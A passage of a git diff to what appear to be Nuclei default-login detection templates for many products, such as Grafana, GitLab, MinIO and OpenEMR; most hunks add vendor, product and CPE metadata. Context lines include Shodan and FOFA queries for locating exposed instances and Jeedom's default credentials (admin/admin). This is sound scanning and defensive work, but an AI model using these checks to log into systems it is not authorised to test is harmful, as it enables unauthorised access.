4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/dataease/dataease-default-login.yaml b/http/default-logins/dataease/dataease-default-login.yaml index de2c5d7694..ae9aa86f9d 100644 --- a/http/default-logins/dataease/dataease-default-login.yaml +++ b/http/default-logins/dataease/dataease-default-login.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: html:"Dataease" + product: dataease + vendor: dataease_project tags: default-login,dataease + classification: + cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:* http: - method: POST path: @@ -42,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/datahub/datahub-metadata-default-login.yaml b/http/default-logins/datahub/datahub-metadata-default-login.yaml index 283871ce7a..0d63391b43 100644 --- a/http/default-logins/datahub/datahub-metadata-default-login.yaml +++ b/http/default-logins/datahub/datahub-metadata-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:datahub_project:datahub:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"DataHub" + product: datahub + vendor: datahub_project tags: datahub,default-login http: diff --git a/http/default-logins/dataiku/dataiku-default-login.yaml b/http/default-logins/dataiku/dataiku-default-login.yaml index c171dad4b5..cf7abfcc27 100644 --- a/http/default-logins/dataiku/dataiku-default-login.yaml +++ b/http/default-logins/dataiku/dataiku-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:dataiku:data_science_studio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"dataiku" + product: data_science_studio + vendor: dataiku tags: default-login,dataiku http: diff --git a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml index 330f016c3d..3078ced72b 100644 --- a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml +++ b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 + product: elasticsearch + vendor: elastic tags: default-login,elasticsearch + classification: + cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml index 93cf1ce1f1..f4078822de 100644 --- a/http/default-logins/esafenet-cdg-default-login.yaml +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 32 fofa-query: esafenet + product: cdg + vendor: esafenet tags: esafenet,cdg,default-login + classification: + cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:* http: - method: POST path: diff --git a/http/default-logins/eurotel/etl3100-default-login.yaml b/http/default-logins/eurotel/etl3100-default-login.yaml index c774c6001a..9a7dc5ea1c 100644 --- a/http/default-logins/eurotel/etl3100-default-login.yaml +++ b/http/default-logins/eurotel/etl3100-default-login.yaml @@ -14,8 +14,12 @@ info: max-request: 2 shodan-query: html:"ETL3100" fofa-query: body="ETL3100" + product: etl3100 + vendor: eurotel tags: misconfig,default-login,eurotel + classification: + cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml index dbed124320..5739fee285 100644 --- a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml +++ b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: title="飞鱼星企业级智能上网行为管理系统" + product: vec40g + vendor: feiyuxing tags: feiyuxing,default-login,iot + classification: + cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/franklin-fueling-default-login.yaml b/http/default-logins/franklin-fueling-default-login.yaml index 4a888f8564..f8f8f56fb4 100644 --- a/http/default-logins/franklin-fueling-default-login.yaml +++ b/http/default-logins/franklin-fueling-default-login.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 google-query: inurl:"relay_status.html" + product: ts-550_evo_firmware + vendor: franklinfueling tags: default-login,franklin + classification: + cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml index c97255d5a7..3465fe08b1 100644 --- a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml +++ b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml @@ -11,10 +11,13 @@ info: metadata: max-request: 1 verified: true - vendor: fuji-xerox + vendor: fujixerox fofa-query: '"prop.htm" && "docucentre"' + product: apeosport-v_c3375 tags: default-login,fuji,fuji-xerox,printer + classification: + cpe: cpe:2.3:h:fujixerox:apeosport-v_c3375:*:*:*:*:*:*:*:* http: - raw: - | @@ -36,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/geoserver/geoserver-default-login.yaml b/http/default-logins/geoserver/geoserver-default-login.yaml index 8826f11126..1c7cc02969 100644 --- a/http/default-logins/geoserver/geoserver-default-login.yaml +++ b/http/default-logins/geoserver/geoserver-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 fofa-query: app="GeoServer" + product: geoserver + vendor: geoserver tags: geoserver,default-login http: diff --git a/http/default-logins/gitblit/gitblit-default-login.yaml b/http/default-logins/gitblit/gitblit-default-login.yaml index 171313a7d6..e12c786dd2 100644 --- a/http/default-logins/gitblit/gitblit-default-login.yaml +++ b/http/default-logins/gitblit/gitblit-default-login.yaml @@ -12,8 +12,12 @@ info: max-request: 1 verified: true shodan-query: title:"Gitblit" + product: gitblit + vendor: gitblit tags: gitblit,default-login + classification: + cpe: cpe:2.3:a:gitblit:gitblit:*:*:*:*:*:*:*:* http: - raw: - | @@ -46,4 +50,4 @@ http: - type: dsl dsl: - "len(body) == 0" -# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/gitlab/gitlab-weak-login.yaml b/http/default-logins/gitlab/gitlab-weak-login.yaml index 7fb809fb41..668069aef9 100644 --- a/http/default-logins/gitlab/gitlab-weak-login.yaml +++ b/http/default-logins/gitlab/gitlab-weak-login.yaml @@ -10,9 +10,12 @@ info: - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab classification: cwe-id: CWE-798 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* metadata: max-request: 6 shodan-query: http.title:"GitLab" + product: gitlab + vendor: gitlab tags: gitlab,default-login http: diff --git a/http/default-logins/grafana/grafana-default-login.yaml b/http/default-logins/grafana/grafana-default-login.yaml index 7c5810a943..a4846f13c0 100644 --- a/http/default-logins/grafana/grafana-default-login.yaml +++ b/http/default-logins/grafana/grafana-default-login.yaml @@ -13,9 +13,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"Grafana" + product: grafana + vendor: grafana tags: grafana,default-login http: diff --git a/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml b/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml index 71e585125e..81101fe1d1 100644 --- a/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml +++ b/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml @@ -9,9 +9,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:h:huawei:hg532e:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"HG532e" + product: hg532e + vendor: huawei tags: default-login,huawei http: diff --git a/http/default-logins/hybris/hybris-default-login.yaml b/http/default-logins/hybris/hybris-default-login.yaml index 25843c9416..97c81443dc 100644 --- a/http/default-logins/hybris/hybris-default-login.yaml +++ b/http/default-logins/hybris/hybris-default-login.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:sap:hybris:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: title:"Hybris" + product: hybris + vendor: sap tags: default-login,hybris http: diff --git a/http/default-logins/ibm/imm-default-login.yaml b/http/default-logins/ibm/imm-default-login.yaml index ff93a2df8a..c293fc9dee 100644 --- a/http/default-logins/ibm/imm-default-login.yaml +++ b/http/default-logins/ibm/imm-default-login.yaml @@ -11,11 +11,14 @@ info: - https://www.ibm.com/docs/en/tcs-service?topic=oip-logging-imm-web-interface classification: cwe-id: CWE-798 + cpe: cpe:2.3:h:ibm:integrated_management_module:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"ibmdojo" fofa-query: "integrated management module" + product: integrated_management_module + vendor: ibm tags: imm,ibm,default-login http: @@ -42,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022053455cd067d472404c212995c8e43ae6c2601b35991e2e769b761a53657e2af8022100eb5d63b688fc790d2e11e68ce980539dd706d1a1de76cbaf28c8a624ffb767c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053455cd067d472404c212995c8e43ae6c2601b35991e2e769b761a53657e2af8022100eb5d63b688fc790d2e11e68ce980539dd706d1a1de76cbaf28c8a624ffb767c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/idemia/idemia-biometrics-default-login.yaml b/http/default-logins/idemia/idemia-biometrics-default-login.yaml index cda1c60a3e..975e7f08a2 100644 --- a/http/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/http/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 + cpe: cpe:2.3:h:idemia:sigma_wide:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"IDEMIA" + product: sigma_wide + vendor: idemia tags: idemia,biometrics,default-login http: @@ -48,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a78dfc18a9a4378a440e7951e508b457396919c39244e6f8491a18a327c4e6e022100f618b58fc8988460e1b06e0ae77547d1ce81c23c2ba53efe16c0ae6cd4f51c16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a78dfc18a9a4378a440e7951e508b457396919c39244e6f8491a18a327c4e6e022100f618b58fc8988460e1b06e0ae77547d1ce81c23c2ba53efe16c0ae6cd4f51c16:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml index a5e356ec0d..8e5f4046e8 100644 --- a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml +++ b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml @@ -10,8 +10,12 @@ info: shodan-query: title:"ISPConfig" http.favicon.hash:483383992 verified: true max-request: 1 + product: ispconfig + vendor: ispconfig tags: ispconfig,hsp,default-login + classification: + cpe: cpe:2.3:a:ispconfig:ispconfig:*:*:*:*:*:*:*:* http: - raw: - | @@ -43,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/jboss/jboss-jbpm-default-login.yaml b/http/default-logins/jboss/jboss-jbpm-default-login.yaml index 591cf2cb7d..71eb2eebd5 100644 --- a/http/default-logins/jboss/jboss-jbpm-default-login.yaml +++ b/http/default-logins/jboss/jboss-jbpm-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:redhat:jbpm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 12 shodan-query: html:"JBossWS" + product: jbpm + vendor: redhat tags: jboss,jbpm,default-login http: diff --git a/http/default-logins/jeedom/jeedom-default-login.yaml b/http/default-logins/jeedom/jeedom-default-login.yaml index 47c07870a7..cb03134d89 100644 --- a/http/default-logins/jeedom/jeedom-default-login.yaml +++ b/http/default-logins/jeedom/jeedom-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: title:"Jeedom" + product: jeedom + vendor: jeedom tags: jeedom,default-login,misconfig + classification: + cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* variables: username: admin password: admin @@ -44,4 +48,4 @@ http: - "logout=1" - "Plugins" condition: and -# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/jellyfin/jellyfin-default-login.yaml b/http/default-logins/jellyfin/jellyfin-default-login.yaml index 5345ff45e9..047eca4ec5 100644 --- a/http/default-logins/jellyfin/jellyfin-default-login.yaml +++ b/http/default-logins/jellyfin/jellyfin-default-login.yaml @@ -9,9 +9,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true fofa-query: title="Jellyfin" + product: jellyfin + vendor: jellyfin tags: default-login,jellyfin,misconfig http: @@ -55,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201613514cc5a03b87e5db34b157adbd75c62cefcc0151e393d868467f14d199da022100aa7639aa3b811e342e0564b16a3760d051868897d7dcc5cc8dc5ca56c300ec3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201613514cc5a03b87e5db34b157adbd75c62cefcc0151e393d868467f14d199da022100aa7639aa3b811e342e0564b16a3760d051868897d7dcc5cc8dc5ca56c300ec3a:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/jupyterhub/jupyterhub-default-login.yaml b/http/default-logins/jupyterhub/jupyterhub-default-login.yaml index a109287373..17d3e02188 100644 --- a/http/default-logins/jupyterhub/jupyterhub-default-login.yaml +++ b/http/default-logins/jupyterhub/jupyterhub-default-login.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:jupyter:jupyterhub:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"JupyterHub" + product: jupyterhub + vendor: jupyter tags: jupyterhub,default-login http: diff --git a/http/default-logins/kanboard-default-login.yaml b/http/default-logins/kanboard-default-login.yaml index b3595760a0..2797c9b3dd 100644 --- a/http/default-logins/kanboard-default-login.yaml +++ b/http/default-logins/kanboard-default-login.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 fofa-query: app="Kanboard" + product: kanboard + vendor: kanboard tags: default-login,kanboard http: diff --git a/http/default-logins/leostream/leostream-default-login.yaml b/http/default-logins/leostream/leostream-default-login.yaml index 19ff436f70..4cc610c686 100644 --- a/http/default-logins/leostream/leostream-default-login.yaml +++ b/http/default-logins/leostream/leostream-default-login.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:leostream:connection_broker:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Leostream" + product: connection_broker + vendor: leostream tags: leostream,default-login http: diff --git a/http/default-logins/magnolia-default-login.yaml b/http/default-logins/magnolia-default-login.yaml index 20cd7d7eb3..b3c5556243 100644 --- a/http/default-logins/magnolia-default-login.yaml +++ b/http/default-logins/magnolia-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:magnolia-cms:magnolia_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: html:"Magnolia is a registered trademark" + product: magnolia_cms + vendor: magnolia-cms tags: magnolia,default-login http: diff --git a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml index 6d248870e1..b444f7412f 100644 --- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:662709064 + product: mantisbt + vendor: mantisbt tags: default-logins,anonymous,mantisbt,default-login + classification: + cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index d84839470b..2e79175fb3 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"MantisBT" + product: mantisbt + vendor: mantisbt tags: mantisbt,default-login http: @@ -72,4 +75,4 @@ http: part: header regex: - "PHPSESSID=([a-zA-Z0-9]+);" -# digest: 4a0a00473045022100e9313e62bc97fd81491c8d92e9f909ab7ba4f4c49f1d794199d318339d8311010220459bfd016362968c49d0b207937aae61ac49778a320268a82ecc84f46dd51891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9313e62bc97fd81491c8d92e9f909ab7ba4f4c49f1d794199d318339d8311010220459bfd016362968c49d0b207937aae61ac49778a320268a82ecc84f46dd51891:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/minio/minio-default-login.yaml b/http/default-logins/minio/minio-default-login.yaml index e8fab7f5de..9fdcf87af4 100644 --- a/http/default-logins/minio/minio-default-login.yaml +++ b/http/default-logins/minio/minio-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"symfony Profiler" + product: minio + vendor: minio tags: default-login,minio http: diff --git a/http/default-logins/mobotix/mobotix-default-login.yaml b/http/default-logins/mobotix/mobotix-default-login.yaml index 05b665fe71..af749c7d95 100644 --- a/http/default-logins/mobotix/mobotix-default-login.yaml +++ b/http/default-logins/mobotix/mobotix-default-login.yaml @@ -9,9 +9,12 @@ info: - https://www.mobotix.com/sites/default/files/2020-01/mx_RM_CameraSoftwareManual_en_200131.pdf classification: cwe-id: CWE-798 + cpe: cpe:2.3:h:mobotix:s14:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"Mobotix" + product: s14 + vendor: mobotix tags: mobotix,default-login,webcam,iot http: diff --git a/http/default-logins/nacos/nacos-default-login.yaml b/http/default-logins/nacos/nacos-default-login.yaml index 4d14e9d597..7f27fe7bba 100644 --- a/http/default-logins/nacos/nacos-default-login.yaml +++ b/http/default-logins/nacos/nacos-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 fofa-query: title=="Nacos" + product: nacos + vendor: alibaba tags: nacos,default-login,alibaba + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/nagios/nagiosxi-default-login.yaml b/http/default-logins/nagios/nagiosxi-default-login.yaml index 955ff28a75..2cf93f43b0 100644 --- a/http/default-logins/nagios/nagiosxi-default-login.yaml +++ b/http/default-logins/nagios/nagiosxi-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-1391 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 shodan-query: title:"Nagios XI" + product: nagios_xi + vendor: nagios tags: nagios,nagiosxi,default-login http: diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml index e7c747cdc2..1e22eb91c0 100644 --- a/http/default-logins/netflow/netflow-default-login.yaml +++ b/http/default-logins/netflow/netflow-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Login - Netflow Analyzer" + product: manageengine_netflow_analyzer + vendor: zohocorp tags: default-login,netflow,misconfig + classification: + cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:* http: - raw: - | @@ -41,4 +45,4 @@ http: part: location words: - "/netflow;jsessionid" -# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/node-red/nodered-default-login.yaml b/http/default-logins/node-red/nodered-default-login.yaml index 12548d6fb5..311ca4e23a 100644 --- a/http/default-logins/node-red/nodered-default-login.yaml +++ b/http/default-logins/node-red/nodered-default-login.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:321591353 + product: node-red + vendor: nodered tags: default-login,node-red,dashboard + classification: + cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:* http: - raw: - | @@ -48,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/nsicg/nsicg-default-login.yaml b/http/default-logins/nsicg/nsicg-default-login.yaml index 03f847e461..351b326181 100644 --- a/http/default-logins/nsicg/nsicg-default-login.yaml +++ b/http/default-logins/nsicg/nsicg-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:netentsec:application_security_gateway:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 fofa-query: "NS-ICG" + product: application_security_gateway + vendor: netentsec tags: nsicg,default-login http: diff --git a/http/default-logins/o2oa/o2oa-default-login.yaml b/http/default-logins/o2oa/o2oa-default-login.yaml index 9e0139fede..e77e4a9b86 100755 --- a/http/default-logins/o2oa/o2oa-default-login.yaml +++ b/http/default-logins/o2oa/o2oa-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title=="O2OA" + product: o2oa + vendor: zoneland tags: o2oa,default-login + classification: + cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/octobercms/octobercms-default-login.yaml b/http/default-logins/octobercms/octobercms-default-login.yaml index 480d0eb092..f6c8dc314d 100644 --- a/http/default-logins/octobercms/octobercms-default-login.yaml +++ b/http/default-logins/octobercms/octobercms-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 shodan-query: http.component:"October CMS" + product: october + vendor: octobercms tags: octobercms,default-login,oss http: diff --git a/http/default-logins/openemr/openemr-default-login.yaml b/http/default-logins/openemr/openemr-default-login.yaml index da0d90daf9..16feab67d3 100644 --- a/http/default-logins/openemr/openemr-default-login.yaml +++ b/http/default-logins/openemr/openemr-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"OpenEMR" fofa-query: app="OpenEMR" + product: openemr + vendor: open-emr tags: openemr,default-login http: diff --git a/http/default-logins/openmediavault/openmediavault-default-login.yaml b/http/default-logins/openmediavault/openmediavault-default-login.yaml index 758b044a38..bb73a2686c 100644 --- a/http/default-logins/openmediavault/openmediavault-default-login.yaml +++ b/http/default-logins/openmediavault/openmediavault-default-login.yaml @@ -11,10 +11,13 @@ info: 